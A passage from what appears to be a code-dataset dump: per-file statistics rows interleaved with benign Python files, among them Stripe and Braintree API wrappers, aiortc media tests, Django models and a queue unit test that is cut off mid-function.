| 23.069444 | 47 | 0.439043 | 698 | 6,644 | 4.179083 | 0.219198 | 0.156325 | 0.254028 | 0.273569 | 0.475831 | 0.475831 | 0.056222 | 0 | 0 | 0 | 0 | 0.073902 | 0.352348 | 6,644 | 287 | 48 | 23.149826 | 0.603997 | 0 | 0 | 0.198606 | 0 | 0 | 0.436936 | 0.006623 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c4bdcfba3d514625a5d312483711b476c4e6a57e | 551 | py | Python | stripe/api_resources/dispute.py | timvisher/stripe-python | ae953fd0aa531f5b500e5e86eee5859df95a255d | [
"MIT"
] | 2 | 2020-12-05T09:02:14.000Z | 2021-03-28T17:23:20.000Z | stripe/api_resources/dispute.py | timvisher/stripe-python | ae953fd0aa531f5b500e5e86eee5859df95a255d | [
"MIT"
] | 11 | 2019-12-26T17:21:03.000Z | 2022-03-21T22:17:07.000Z | lib/stripe/api_resources/dispute.py | linuxpi/hypoconn_gcloud | ebf06c44dc754ac446a0915a0db028f18e3f35a7 | [
"Apache-2.0"
] | 2 | 2019-12-19T10:25:38.000Z | 2020-01-03T08:54:20.000Z | from __future__ import absolute_import, division, print_function
from stripe import util
from stripe.api_resources.abstract import ListableAPIResource
from stripe.api_resources.abstract import UpdateableAPIResource
class Dispute(ListableAPIResource, UpdateableAPIResource):
OBJECT_NAME = 'dispute'
def close(self, idempotency_key=None, **params):
url = self.instance_url() + '/close'
headers = util.populate_headers(idempotency_key)
self.refresh_from(self.request('post', url, params, headers))
return self
| 34.4375 | 69 | 0.764065 | 62 | 551 | 6.564516 | 0.532258 | 0.07371 | 0.063882 | 0.108108 | 0.176904 | 0.176904 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15608 | 551 | 15 | 70 | 36.733333 | 0.875269 | 0 | 0 | 0 | 0 | 0 | 0.030853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.727273 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
c4e5e125594ec7571b54a20e6edf7d5b9509531f | 656 | py | Python | aldjemy/wrapper.py | Piero-Palevsky-OH/aldjemy | dc79f3b7aabe47c4a13e44f61038bc19a921980d | [
"BSD-3-Clause"
] | 255 | 2015-01-20T08:55:20.000Z | 2020-01-17T11:23:31.000Z | aldjemy/wrapper.py | Piero-Palevsky-OH/aldjemy | dc79f3b7aabe47c4a13e44f61038bc19a921980d | [
"BSD-3-Clause"
] | 113 | 2020-01-24T19:43:46.000Z | 2022-03-27T08:57:53.000Z | aldjemy/wrapper.py | Piero-Palevsky-OH/aldjemy | dc79f3b7aabe47c4a13e44f61038bc19a921980d | [
"BSD-3-Clause"
] | 53 | 2015-01-22T12:58:35.000Z | 2020-01-12T23:20:18.000Z | class Wrapper:
"Wrapper to disable commit in sqla"
def __init__(self, obj):
self.obj = obj
def __getattr__(self, attr):
if attr in ["commit", "rollback"]:
return lambda *args, **kwargs: None
obj = getattr(self.obj, attr)
if attr not in ["cursor", "execute"]:
return obj
if attr == "cursor":
return type(self)(obj)
return self.wrapper(obj)
def wrapper(self, obj):
"Implement if you need to make your customized wrapper"
return obj
def __call__(self, *args, **kwargs):
self.obj = self.obj(*args, **kwargs)
return self
| 27.333333 | 63 | 0.565549 | 81 | 656 | 4.432099 | 0.382716 | 0.13649 | 0.061281 | 0.077994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.321646 | 656 | 23 | 64 | 28.521739 | 0.806742 | 0.132622 | 0 | 0.105263 | 0 | 0 | 0.181402 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
c4e8a57a1d8989b002c52e56cd6c82d2de98658b | 1,760 | py | Python | saleor/lib/python3.7/site-packages/braintree/paypal_account_gateway.py | cxsper/saleor | 5566ddcdaf8f72ba872eca869798e66eb9cdae44 | [
"BSD-3-Clause"
] | 2 | 2019-12-06T15:40:14.000Z | 2020-07-29T21:30:35.000Z | saleor/lib/python3.7/site-packages/braintree/paypal_account_gateway.py | cxsper/saleor | 5566ddcdaf8f72ba872eca869798e66eb9cdae44 | [
"BSD-3-Clause"
] | 13 | 2020-03-24T17:53:51.000Z | 2022-02-10T20:01:14.000Z | myvenv/lib/python3.6/site-packages/braintree/paypal_account_gateway.py | yog240597/saleor | b75a23827a4ec2ce91637f0afe6808c9d09da00a | [
"CC-BY-4.0"
] | 2 | 2019-05-06T01:10:41.000Z | 2019-05-06T01:10:42.000Z | import braintree
from braintree.paypal_account import PayPalAccount
from braintree.error_result import ErrorResult
from braintree.exceptions.not_found_error import NotFoundError
from braintree.resource import Resource
from braintree.successful_result import SuccessfulResult
class PayPalAccountGateway(object):
def __init__(self, gateway):
self.gateway = gateway
self.config = gateway.config
def find(self, paypal_account_token):
try:
if paypal_account_token is None or paypal_account_token.strip() == "":
raise NotFoundError()
response = self.config.http().get(self.config.base_merchant_path() + "/payment_methods/paypal_account/" + paypal_account_token)
if "paypal_account" in response:
return PayPalAccount(self.gateway, response["paypal_account"])
except NotFoundError:
raise NotFoundError("paypal account with token " + repr(paypal_account_token) + " not found")
def delete(self, paypal_account_token):
self.config.http().delete(self.config.base_merchant_path() + "/payment_methods/paypal_account/" + paypal_account_token)
return SuccessfulResult()
def update(self, paypal_account_token, params={}):
Resource.verify_keys(params, PayPalAccount.signature())
response = self.config.http().put(self.config.base_merchant_path() + "/payment_methods/paypal_account/" + paypal_account_token, {"paypal_account": params})
if "paypal_account" in response:
return SuccessfulResult({"paypal_account": PayPalAccount(self.gateway, response["paypal_account"])})
elif "api_error_response" in response:
return ErrorResult(self.gateway, response["api_error_response"])
| 50.285714 | 163 | 0.723295 | 196 | 1,760 | 6.239796 | 0.280612 | 0.212592 | 0.132461 | 0.053966 | 0.298446 | 0.298446 | 0.174162 | 0.174162 | 0.174162 | 0.174162 | 0 | 0 | 0.181818 | 1,760 | 34 | 164 | 51.764706 | 0.849306 | 0 | 0 | 0.068966 | 0 | 0 | 0.143182 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.206897 | 0 | 0.517241 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f2022bc40eecc81e28e26c6af9c01ec57c188253 | 931 | py | Python | oo/pessoa.py | Sir-Gonzo/pythonbirds | 2653da896d05e74d204d2f97c92f8bcfaa4d0013 | [
"MIT"
] | null | null | null | oo/pessoa.py | Sir-Gonzo/pythonbirds | 2653da896d05e74d204d2f97c92f8bcfaa4d0013 | [
"MIT"
] | null | null | null | oo/pessoa.py | Sir-Gonzo/pythonbirds | 2653da896d05e74d204d2f97c92f8bcfaa4d0013 | [
"MIT"
] | null | null | null | class Pessoa:
olhos = 2 # atributo de classe
def __init__(self, *filhos, nome=None, idade=35): # atributos de instância
self.idade = idade
self.nome = nome
self.filhos = list(filhos)
def cumprimentar(self):
return f'Olá {id(self)}.'
@staticmethod
def metodo_estatico():
return 42
@classmethod
def metodo_de_classe(cls):
return f'{cls} - olhos: {cls.olhos}'
class Homem(Pessoa):
def cumprimentar(self):
return f'{super().cumprimentar()} Aperto de mão'
class Mutante(Pessoa):
olhos = 3
if __name__ == "__main__":
luciano = Homem(nome="Luciano")
renzo = Mutante("Luciano", "Luciana", "Pedro", nome="Renzo")
print(f"{renzo.nome} tem os filhos {', '.join(str(x) for x in renzo.filhos[:-1])} e {renzo.filhos[-1]}.")
print(luciano.cumprimentar())
print(Pessoa.metodo_estatico())
print(luciano.metodo_de_classe())
| 27.382353 | 109 | 0.625134 | 118 | 931 | 4.779661 | 0.440678 | 0.042553 | 0.067376 | 0.088652 | 0.092199 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011127 | 0.227712 | 931 | 33 | 110 | 28.212121 | 0.773296 | 0.044039 | 0 | 0.076923 | 0 | 0.038462 | 0.240135 | 0.027058 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0 | 0.153846 | 0.538462 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
f20b629f6076335837fcdba2acc333eea27865ad | 1,052 | py | Python | findy/vendor/wechatpy/work/client/api/menu.py | doncat99/FinanceDataCenter | 1538c8347ed5bff9a99a3cca07507a7605108124 | [
"MIT"
] | null | null | null | findy/vendor/wechatpy/work/client/api/menu.py | doncat99/FinanceDataCenter | 1538c8347ed5bff9a99a3cca07507a7605108124 | [
"MIT"
] | null | null | null | findy/vendor/wechatpy/work/client/api/menu.py | doncat99/FinanceDataCenter | 1538c8347ed5bff9a99a3cca07507a7605108124 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from findy.vendor.wechatpy.client.api.base import BaseWeChatAPI
class WeChatMenu(BaseWeChatAPI):
"""
自定义菜单
https://work.weixin.qq.com/api/doc#90000/90135/90230
"""
def create(self, agent_id, menu_data):
"""
创建菜单
https://work.weixin.qq.com/api/doc#90000/90135/90231
:param agent_id: 应用id
"""
return self._post("menu/create", params={"agentid": agent_id}, data=menu_data)
def get(self, agent_id):
"""
获取菜单
https://work.weixin.qq.com/api/doc#90000/90135/90232
:param agent_id: 应用id
"""
return self._get("menu/get", params={"agentid": agent_id})
def delete(self, agent_id):
"""
删除菜单
https://work.weixin.qq.com/api/doc#90000/90135/90233
:param agent_id: 应用id
"""
return self._get("menu/delete", params={"agentid": agent_id})
def update(self, agent_id, menu_data):
self.delete(agent_id)
return self.create(agent_id, menu_data)
| 22.382979 | 86 | 0.590304 | 136 | 1,052 | 4.426471 | 0.338235 | 0.139535 | 0.099668 | 0.112957 | 0.531561 | 0.392027 | 0.348837 | 0.348837 | 0.239203 | 0 | 0 | 0.078406 | 0.260456 | 1,052 | 46 | 87 | 22.869565 | 0.695373 | 0.311787 | 0 | 0 | 0 | 0 | 0.086882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0 | 0.090909 | 0 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f211eb23f573ba0015f8707cbfda65f74ffae9cf | 9,608 | py | Python | tests/test_contrib_media.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | [
"BSD-3-Clause"
] | 4 | 2019-09-02T22:26:03.000Z | 2020-09-02T18:13:29.000Z | tests/test_contrib_media.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | [
"BSD-3-Clause"
] | null | null | null | tests/test_contrib_media.py | AlexVestin/cloneaio | 5792c819482ed7e19252b8b0c00532a0932e0b3b | [
"BSD-3-Clause"
] | 2 | 2021-03-04T04:05:54.000Z | 2021-03-25T07:33:43.000Z | import asyncio
import os
import tempfile
import wave
from unittest import TestCase
import av
from aiortc import AudioStreamTrack, VideoStreamTrack
from aiortc.contrib.media import MediaBlackhole, MediaPlayer, MediaRecorder
from aiortc.mediastreams import MediaStreamError
from .codecs import CodecTestCase
from .utils import run
class MediaTestCase(CodecTestCase):
def setUp(self):
self.directory = tempfile.TemporaryDirectory()
def tearDown(self):
self.directory.cleanup()
def create_audio_file(self, name, channels=1, sample_rate=8000, sample_width=2):
path = self.temporary_path(name)
writer = wave.open(path, 'wb')
writer.setnchannels(channels)
writer.setframerate(sample_rate)
writer.setsampwidth(sample_width)
writer.writeframes(b'\x00' * sample_rate * sample_width * channels)
writer.close()
return path
def create_video_file(self, name, width=640, height=480, rate=30, duration=1):
path = self.temporary_path(name)
container = av.open(path, 'w')
if name.endswith('.png'):
stream = container.add_stream('png', rate=rate)
stream.pix_fmt = 'rgb24'
else:
stream = container.add_stream('mpeg4', rate=rate)
for frame in self.create_video_frames(width=width, height=height, count=duration * rate):
for packet in stream.encode(frame):
container.mux(packet)
for packet in stream.encode(None):
container.mux(packet)
container.close()
return path
def temporary_path(self, name):
return os.path.join(self.directory.name, name)
class MediaBlackholeTest(TestCase):
def test_audio(self):
recorder = MediaBlackhole()
recorder.addTrack(AudioStreamTrack())
run(recorder.start())
run(asyncio.sleep(1))
run(recorder.stop())
def test_audio_ended(self):
track = AudioStreamTrack()
recorder = MediaBlackhole()
recorder.addTrack(track)
run(recorder.start())
run(asyncio.sleep(1))
track.stop()
run(asyncio.sleep(1))
run(recorder.stop())
def test_audio_and_video(self):
recorder = MediaBlackhole()
recorder.addTrack(AudioStreamTrack())
recorder.addTrack(VideoStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
def test_video(self):
recorder = MediaBlackhole()
recorder.addTrack(VideoStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
def test_video_ended(self):
track = VideoStreamTrack()
recorder = MediaBlackhole()
recorder.addTrack(track)
run(recorder.start())
run(asyncio.sleep(1))
track.stop()
run(asyncio.sleep(1))
run(recorder.stop())
class MediaPlayerTest(MediaTestCase):
def test_audio_file_8kHz(self):
path = self.create_audio_file('test.wav')
player = MediaPlayer(path)
# check tracks
self.assertIsNotNone(player.audio)
self.assertIsNone(player.video)
# read all frames
self.assertEqual(player.audio.readyState, 'live')
for i in range(49):
frame = run(player.audio.recv())
self.assertEqual(frame.format.name, 's16')
self.assertEqual(frame.layout.name, 'stereo')
self.assertEqual(frame.samples, 960)
self.assertEqual(frame.sample_rate, 48000)
with self.assertRaises(MediaStreamError):
run(player.audio.recv())
self.assertEqual(player.audio.readyState, 'ended')
# try reading again
with self.assertRaises(MediaStreamError):
run(player.audio.recv())
def test_audio_file_48kHz(self):
path = self.create_audio_file('test.wav', sample_rate=48000)
player = MediaPlayer(path)
# check tracks
self.assertIsNotNone(player.audio)
self.assertIsNone(player.video)
# read all frames
self.assertEqual(player.audio.readyState, 'live')
for i in range(50):
frame = run(player.audio.recv())
self.assertEqual(frame.format.name, 's16')
self.assertEqual(frame.layout.name, 'stereo')
self.assertEqual(frame.samples, 960)
self.assertEqual(frame.sample_rate, 48000)
with self.assertRaises(MediaStreamError):
run(player.audio.recv())
self.assertEqual(player.audio.readyState, 'ended')
def test_video_file_png(self):
path = self.create_video_file('test-%3d.png', duration=3)
player = MediaPlayer(path)
# check tracks
self.assertIsNone(player.audio)
self.assertIsNotNone(player.video)
# read all frames
self.assertEqual(player.video.readyState, 'live')
for i in range(90):
frame = run(player.video.recv())
self.assertEqual(frame.width, 640)
self.assertEqual(frame.height, 480)
with self.assertRaises(MediaStreamError):
run(player.video.recv())
self.assertEqual(player.video.readyState, 'ended')
def test_video_file_mp4(self):
path = self.create_video_file('test.mp4', duration=3)
player = MediaPlayer(path)
# check tracks
self.assertIsNone(player.audio)
self.assertIsNotNone(player.video)
# read all frames
self.assertEqual(player.video.readyState, 'live')
for i in range(90):
frame = run(player.video.recv())
self.assertEqual(frame.width, 640)
self.assertEqual(frame.height, 480)
with self.assertRaises(MediaStreamError):
run(player.video.recv())
self.assertEqual(player.video.readyState, 'ended')
class MediaRecorderTest(MediaTestCase):
def test_audio_mp3(self):
path = self.temporary_path('test.mp3')
recorder = MediaRecorder(path)
recorder.addTrack(AudioStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
# check output media
container = av.open(path, 'r')
self.assertEqual(len(container.streams), 1)
self.assertIn(container.streams[0].codec.name, ('mp3', 'mp3float'))
self.assertGreater(
float(container.streams[0].duration * container.streams[0].time_base), 0)
def test_audio_wav(self):
path = self.temporary_path('test.wav')
recorder = MediaRecorder(path)
recorder.addTrack(AudioStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
# check output media
container = av.open(path, 'r')
self.assertEqual(len(container.streams), 1)
self.assertEqual(container.streams[0].codec.name, 'pcm_s16le')
self.assertGreater(
float(container.streams[0].duration * container.streams[0].time_base), 0)
def test_audio_wav_ended(self):
track = AudioStreamTrack()
recorder = MediaRecorder(self.temporary_path('test.wav'))
recorder.addTrack(track)
run(recorder.start())
run(asyncio.sleep(1))
track.stop()
run(asyncio.sleep(1))
run(recorder.stop())
def test_audio_and_video(self):
path = self.temporary_path('test.mp4')
recorder = MediaRecorder(path)
recorder.addTrack(AudioStreamTrack())
recorder.addTrack(VideoStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
# check output media
container = av.open(path, 'r')
self.assertEqual(len(container.streams), 2)
self.assertEqual(container.streams[0].codec.name, 'aac')
self.assertGreater(
float(container.streams[0].duration * container.streams[0].time_base), 0)
self.assertEqual(container.streams[1].codec.name, 'h264')
self.assertEqual(container.streams[1].width, 640)
self.assertEqual(container.streams[1].height, 480)
self.assertGreater(
float(container.streams[1].duration * container.streams[1].time_base), 0)
def test_video_png(self):
path = self.temporary_path('test-%3d.png')
recorder = MediaRecorder(path)
recorder.addTrack(VideoStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
# check output media
container = av.open(path, 'r')
self.assertEqual(len(container.streams), 1)
self.assertEqual(container.streams[0].codec.name, 'png')
self.assertGreater(
float(container.streams[0].duration * container.streams[0].time_base), 0)
self.assertEqual(container.streams[0].width, 640)
self.assertEqual(container.streams[0].height, 480)
def test_video_mp4(self):
path = self.temporary_path('test.mp4')
recorder = MediaRecorder(path)
recorder.addTrack(VideoStreamTrack())
run(recorder.start())
run(asyncio.sleep(2))
run(recorder.stop())
# check output media
container = av.open(path, 'r')
self.assertEqual(len(container.streams), 1)
self.assertEqual(container.streams[0].codec.name, 'h264')
self.assertGreater(
float(container.streams[0].duration * container.streams[0].time_base), 0)
self.assertEqual(container.streams[0].width, 640)
self.assertEqual(container.streams[0].height, 480)
| 33.361111 | 97 | 0.633118 | 1,062 | 9,608 | 5.655367 | 0.138418 | 0.08991 | 0.05378 | 0.034799 | 0.767066 | 0.720779 | 0.677656 | 0.660506 | 0.640193 | 0.632201 | 0 | 0.021589 | 0.247918 | 9,608 | 287 | 98 | 33.477352 | 0.809577 | 0.02373 | 0 | 0.666667 | 0 | 0 | 0.02189 | 0 | 0 | 0 | 0 | 0 | 0.255708 | 1 | 0.091324 | false | 0 | 0.050228 | 0.004566 | 0.173516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f214f18d6d3f2d1b56c4ab05f98bd982fbe2ce0e | 356 | py | Python | pynex02.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | pynex02.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | pynex02.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python -tt
import sys;
def main():
prevnum = 0
N = int(input('Enter the range value: '))
for curnum in range(0, N):
sumval = prevnum + curnum
print('prev num: %d, curr num: %d, sum (prev + curr): %d' % (prevnum, curnum, sumval))
prevnum = curnum
if __name__ == '__main__':
main()
sys.exit(0)
| 18.736842 | 94 | 0.553371 | 49 | 356 | 3.857143 | 0.612245 | 0.206349 | 0.201058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011858 | 0.289326 | 356 | 18 | 95 | 19.777778 | 0.735178 | 0.05618 | 0 | 0 | 0 | 0 | 0.24024 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.181818 | 0.090909 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f2177899c1f7e3bb1b260d349ee41e6e898f5063 | 257 | py | Python | output/models/nist_data/list_pkg/id/schema_instance/nistschema_sv_iv_list_id_min_length_5_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/nist_data/list_pkg/id/schema_instance/nistschema_sv_iv_list_id_min_length_5_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/nist_data/list_pkg/id/schema_instance/nistschema_sv_iv_list_id_min_length_5_xsd/__init__.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from output.models.nist_data.list_pkg.id.schema_instance.nistschema_sv_iv_list_id_min_length_5_xsd.nistschema_sv_iv_list_id_min_length_5 import (
NistschemaSvIvListIdMinLength5,
Out,
)
__all__ = [
"NistschemaSvIvListIdMinLength5",
"Out",
]
| 25.7 | 145 | 0.805447 | 33 | 257 | 5.606061 | 0.636364 | 0.12973 | 0.151351 | 0.194595 | 0.324324 | 0.324324 | 0.324324 | 0.324324 | 0 | 0 | 0 | 0.017621 | 0.116732 | 257 | 9 | 146 | 28.555556 | 0.797357 | 0 | 0 | 0 | 0 | 0 | 0.128405 | 0.116732 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f21e7b555dcbe92ee36f1b6a0557a58d2bd4b847 | 652 | py | Python | alerter/src/channels_manager/handlers/handler.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 41 | 2019-08-23T12:40:42.000Z | 2022-03-28T11:06:02.000Z | alerter/src/channels_manager/handlers/handler.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 147 | 2019-08-30T22:09:48.000Z | 2022-03-30T08:46:26.000Z | alerter/src/channels_manager/handlers/handler.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 3 | 2019-09-03T21:12:28.000Z | 2021-08-18T14:27:56.000Z | import logging
from abc import ABC
from src.abstract.publisher_subscriber import PublisherSubscriberComponent
from src.message_broker.rabbitmq import RabbitMQApi
class ChannelHandler(PublisherSubscriberComponent, ABC):
def __init__(self, handler_name: str, logger: logging.Logger,
rabbitmq: RabbitMQApi) -> None:
super().__init__(logger, rabbitmq)
self._handler_name = handler_name
def __str__(self) -> str:
return self.handler_name
@property
def handler_name(self) -> str:
return self._handler_name
def _listen_for_data(self) -> None:
self.rabbitmq.start_consuming()
| 27.166667 | 74 | 0.717791 | 73 | 652 | 6.054795 | 0.424658 | 0.149321 | 0.135747 | 0.076923 | 0.126697 | 0.126697 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205521 | 652 | 23 | 75 | 28.347826 | 0.853282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.125 | 0.6875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
f2272804f4c27a4d70c3cd71b8a2757e1fc1891c | 1,672 | py | Python | meh/vermin/models.py | comandrei/meh | 716d2260e99df969a6672e259b1f79d6ef08d499 | [
"MIT"
] | null | null | null | meh/vermin/models.py | comandrei/meh | 716d2260e99df969a6672e259b1f79d6ef08d499 | [
"MIT"
] | null | null | null | meh/vermin/models.py | comandrei/meh | 716d2260e99df969a6672e259b1f79d6ef08d499 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.db import models
from .tasks import generate_thumbnail, send_email
THUMBNAIL_SIZES = [
(120, 120),
(90, 90)
]
class Post(models.Model):
author = models.ForeignKey(settings.AUTH_USER_MODEL)
created = models.DateTimeField(auto_now_add=True)
text = models.TextField()
image = models.ImageField(upload_to="posts",
null=True, blank=True)
def save(self, *args, **kwargs):
post = super(Post, self).save(*args, **kwargs)
if self.image:
for size in THUMBNAIL_SIZES:
generate_thumbnail(self.image.path, size)
return post
class Meh(models.Model):
created = models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(settings.AUTH_USER_MODEL)
post = models.ForeignKey(Post)
def save(self, *args, **kwargs):
meh = super(Meh, self).save(*args, **kwargs)
send_email(to=self.post.author.email,
from_email=self.author.email,
subject="{} mehed your your post {}".format(self.author, self.post),
text="trololo")
return meh
class Eh(models.Model):
created = models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(settings.AUTH_USER_MODEL)
post = models.ForeignKey(Post)
def save(self, *args, **kwargs):
eh = super(Eh, self).save(*args, **kwargs)
send_email(to=self.post.author.email,
from_email=self.author.email,
subject="{} ehed your your post {}".format(self.author, self.post),
text="trololololo")
return eh
| 31.54717 | 87 | 0.620215 | 202 | 1,672 | 5.024752 | 0.287129 | 0.059113 | 0.065025 | 0.08867 | 0.610837 | 0.590148 | 0.590148 | 0.552709 | 0.508374 | 0.429557 | 0 | 0.008084 | 0.260167 | 1,672 | 52 | 88 | 32.153846 | 0.812449 | 0 | 0 | 0.365854 | 1 | 0 | 0.044258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.073171 | 0 | 0.536585 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1ef3f84f7b0db6b939c14c8d8ef90faa611b7481 | 2,265 | py | Python | circular_buffer/tests/test_queue.py | mrakitin/circular_buffer | 5da8bd4d94324b2460d44ed11036747a885550a5 | [
"BSD-3-Clause"
] | null | null | null | circular_buffer/tests/test_queue.py | mrakitin/circular_buffer | 5da8bd4d94324b2460d44ed11036747a885550a5 | [
"BSD-3-Clause"
] | null | null | null | circular_buffer/tests/test_queue.py | mrakitin/circular_buffer | 5da8bd4d94324b2460d44ed11036747a885550a5 | [
"BSD-3-Clause"
] | null | null | null | #!/bin/env python
# -*- coding: utf-8 -*-
"""test Queue
by Valentyn Stadnytskyi
created: August 2, 2019
This is a test library to evaluate the performance of the code.
Queue is an abstract data structure, somewhat similar to Stacks. Unlike stacks, a queue is open at both its ends.
One end is always used to insert data (enqueue) and the other is used to remove data (dequeue)..
to run unittest: python3 -m unittest test_queue
"""
from __future__ import print_function
from copy import copy, deepcopy
import pickle
import unittest
import numpy as np
from numpy.testing import assert_, assert_almost_equal, assert_equal
from ..queue import Queue
from numpy import zeros
class QueueTest(unittest.TestCase):
def test_queue_end(self):
queue = Queue(shape = (100,2))
self.assertEqual(queue.rear, 0)
def test_1(self):
from numpy import std,random
queue = Queue(shape = (100,2))
data = random.randint(1024, size=(5, 2))
queue.enqueue(data)
self.assertEqual(queue.length, 5)
self.assertEqual(queue.rear, 5)
queue.enqueue(data)
dequeue_data = queue.dequeue(N=3)
self.assertEqual(queue.length, 7)
self.assertEqual(std(dequeue_data), std(data[:3]))
def test_attributes(self):
from numpy import std,random
